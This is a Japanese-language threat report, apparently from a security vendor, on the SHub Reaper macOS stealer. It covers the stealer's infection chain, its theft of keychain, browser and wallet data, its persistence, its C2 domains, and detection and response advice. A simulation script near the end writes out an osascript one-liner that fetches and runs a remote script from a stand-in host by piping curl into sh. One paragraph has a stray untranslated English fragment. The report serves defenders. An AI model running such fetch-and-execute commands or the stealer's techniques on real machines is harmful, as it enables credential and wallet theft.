SHub Reaper | macOS スティーラーによるApple、Google、Microsoftを一度に偽装する攻撃チェーン

SOC Prime Team

フォローする

SHub Reaper | macOS スティーラーによるApple、Google、Microsoftを一度に偽装する攻撃チェーン

Detection stack

AIDR
Alert
ETL
Query

脅威レポート
攻撃フロー
検出
シミュレーション

サマリー

このレポートは、SHub Reaperと呼ばれる新しいmacOS情報スティーラーのバリアントを分析しており、タイポスクワットされたMicrosoftをテーマにしたドメインを通じて悪意のあるAppleScriptペイロードを配信するために偽のWeChatおよびMiroインストーラを使用しています。Script Editorで起動されると、ペイロードはブラウザーデータ、暗号通貨ウォレットファイル、キーチェーン情報を収集し、ストールンコンテンツをチャンク化されたZIPアーカイブとして流出させます。マルウェアはまた、ウォレットファイルをいじり、Googleソフトウェアのアップデートに偽装したLaunchAgentを通じて持続性を確立します。推奨される検出は、AppleScriptの実行、疑わしいLaunchAgentの作成、および既知のコマンド＆コントロールインフラストラクチャへのアウトバウンドトラフィックに焦点を当てています。

調査

SentinelOneは、悪用された applescript:// スキーム、AppleScriptペイロードの動的生成、およびAMOSで見られるドキュメント盗難行為を反映したファイルグラビングモジュールを含むフルマルチステージ配信チェーンを追跡しました。研究者は、コマンド＆コントロールドメインへのネットワークトラフィックをキャプチャしました hebsbsbzjsjshduxbs.xyz および関連するエンドポイントに加え、ユーザーのライブラリディレクトリに配置された一時ファイル及びLaunchAgentの作成を発見しました。この調査では、オペレーターのテレメトリーに使用されるハードコーディングされたTelegramボットの機能も明らかにされました。 /tmp and a LaunchAgent placed in the user’s Library directory. The investigation also uncovered hard-coded Telegram bot functionality used for operator telemetry.

緩和策

防御者は、タイポスクワットされたドメイン mlcrosoft.co.com, qq-0732gwh22.com、そして mlroweb.comへのアクセスをブロックし、Googleのアップデートコンポーネントを模したパスに作成されたLaunchAgentを監視すべきです。アプリケーションの許可リストを使用して、信頼されていないソースからのAppleScriptの実行を制限し、厳格なコード署名検証を実施する必要があります。ネットワーク検出も、特定のコマンド＆コントロールドメインおよびその既知のAPIパスとの通信に警告を出すべきです。

レスポンス

SHub Reaperの活動が検出された場合、影響を受けるエンドポイントを直ちに隔離し、疑わしいAppleScriptまたはLaunchAgentプロセスを終了し、から悪意のあるファイルを削除します /tmp およびユーザーライブラリ。その後、調査者はブラウザーデータストア、ウォレットディレクトリ、およびクレデンシャルリポジトリの完全なフォレンジックコレクションを行い、妥協が疑われる場合はクレデンシャルのリセットを行います。特定されたコマンド＆コントロールインフラはブロックされ、インシデントレスポンステームは環境全体でより広範囲な脅威ハンティングを開始すべきです。

graph TB %% クラス定義 classDef action fill:#99ccff classDef tool fill:#ffcc99 classDef malware fill:#ff9999 classDef operator fill:#ff9900 %% ノード – 攻撃ステップ step_initial_access[“技術 – T1659 コンテンツインジェクション: 侵害されたおとりWebサイト（偽のWeChatまたはMiro）が、ペイロードを配信する悪意のある applescript:// URL をホスト”] class step_initial_access action step_execution[“技術 – T1027 難読化されたファイルまたは情報: Script Editor で開かれた AppleScript が、base64 でエンコードされた隠し curl 呼び出しを実行し、stager をデコードして実行”] class step_execution action step_code_retrieval[“技術 – T1505 サーバーソフトウェアコンポーネント: AppleScript がリモートサーバーからコアとなる悪意のある AppleScript をダウンロード”] class step_code_retrieval action step_credential_capture[“技術 – T1056 入力キャプチャ: AppleScript がユーザーにパスワード入力を要求し、Keychain データを窃取”] class step_credential_capture action step_data_collection[“技術 – T1074.001 ローカルデータステージング: Filegrabber が Desktop と Documents をスキャンして対象拡張子を探し、/tmp/shub_<rand> にステージング”] class step_data_collection action step_archive[“技術 – T1560.001 ユーティリティによるアーカイブ: 収集したファイルを ZIP 化し、70 MB のチャンクに分割”] class step_archive action step_exfiltration[“技術 – T1011 その他のネットワーク媒体によるデータ持ち出し: チャンクを HTTPS 経由でコマンド＆コントロールサーバーへアップロード”] class step_exfiltration action step_wallet_hijack[“技術 – T1553.002 コード署名 および T1036.001 偽装: 悪意のある app.asar ファイルが正規ウォレットバイナリを置き換え、アドホックまたは無効なコード署名を利用して Gatekeeper を回避”] class step_wallet_hijack action step_persistence[“技術 – T1037.002 Login Hook、T1176 ソフトウェア拡張 および T1574.007 パスインターセプション: PATH 内に配置された LaunchAgent plist（com.google.keystone.agent.plist）を含む偽の Google Software Update ディレクトリにより永続実行を実現”] class step_persistence action step_backdoor[“技術 – T1219 リモートアクセスツール: LaunchAgent が 60 秒ごとに GoogleUpdate スクリプトを実行し、/api/bot/heartbeat へビーコン送信を行い、追加コマンドを実行可能”] class step_backdoor malware %% ノード – ツール / コンポーネント tool_applescript[“ツール – 名前: AppleScript 説明: Script Editor 経由で実行され、ペイロードをデコードして起動するスクリプト”] class tool_applescript tool tool_curl[“ツール – 名前: curl 説明: HTTPS 経由で追加の AppleScript およびデータファイルをダウンロードするために使用”] class tool_curl tool tool_launchagent[“ツール – 名前: LaunchAgent 説明: plist により定義される macOS のユーザーレベル永続化メカニズム”] class tool_launchagent tool malware_stager[“マルウェア – 名前: Stager 説明: メインの AppleScript ペイロードを取得する小型ローダー”] class malware_stager malware %% エッジ – フロー step_initial_access –>|につながる| step_execution step_execution –>|使用| tool_applescript step_execution –>|実行| malware_stager malware_stager –>|経由でダウンロード| tool_curl malware_stager –>|トリガー| step_code_retrieval step_code_retrieval –>|使用| tool_curl step_code_retrieval –>|有効化| step_credential_capture step_credential_capture –>|取得| step_data_collection step_data_collection –>|ファイルを準備| step_archive step_archive –>|チャンクを作成| step_exfiltration step_exfiltration –>|送信先| step_wallet_hijack step_wallet_hijack –>|変更| step_persistence step_persistence –>|インストール| tool_launchagent tool_launchagent –>|提供| step_backdoor step_backdoor –>|として動作| malware_stager %% クラス割り当て class step_initial_access,step_execution,step_code_retrieval,step_credential_capture,step_data_collection,step_archive,step_exfiltration,step_wallet_hijack,step_persistence,step_backdoor action class tool_applescript,tool_curl,tool_launchagent tool class malware_stager,step_backdoor malware

攻撃フロー

攻撃概要とコマンド:
攻撃者は一行で osascript を利用してシェルコマンドを実行する一行のスクリプトを作成。AppleScript内で シェルスクリプトを実行 として使用します curl はリモートシェルスクリプト（payload.sh）をダウンロードし、それを直接 sh にパイプして実行します。AppleScript呼び出し全体が単一の中に埋め込まれているため、macOSは単一の プロセス生成 イベントとして記録し、そのコマンドラインには osascript and curlが含まれており、検出ルールを満たしている。

回帰テストスクリプト:

#!/bin/bash
#
# macOSでSHub Reaperの実行をシミュレート
# 'osascript'と'curl'を両方含む単一のプロセス生成イベントを生成
#
MALICIOUS_URL="https://malicious.example.com/payload.sh"

# ワンライナー: osascriptがペイロードをcurlして実行するシェルコマンドを実行
osascript -e "do shell script "curl -s ${MALICIOUS_URL} | sh""

クリーンアップコマンド:

#!/bin/bash
#
# シミュレーションで作成されたアーティファクトをクリーンアップ。
# ペイロードはメモリ上で実行され、ファイルを書き込みませんが、残存プロセスがないようにします。
#
# テストにより開始された 'sh' プロセスを終了（本番システムでの使用には注意）
pkill -f "sh -c curl -s https://malicious.example.com/payload.sh"

SOC PrimeのDetection as Codeプラットフォームに参加し ビジネスに最も関連性のある脅威に対する可視性を向上させましょう。開始して即座に価値をもたらすためには、今すぐSOC Primeの専門家とのミーティングを予約してください。

無料で参加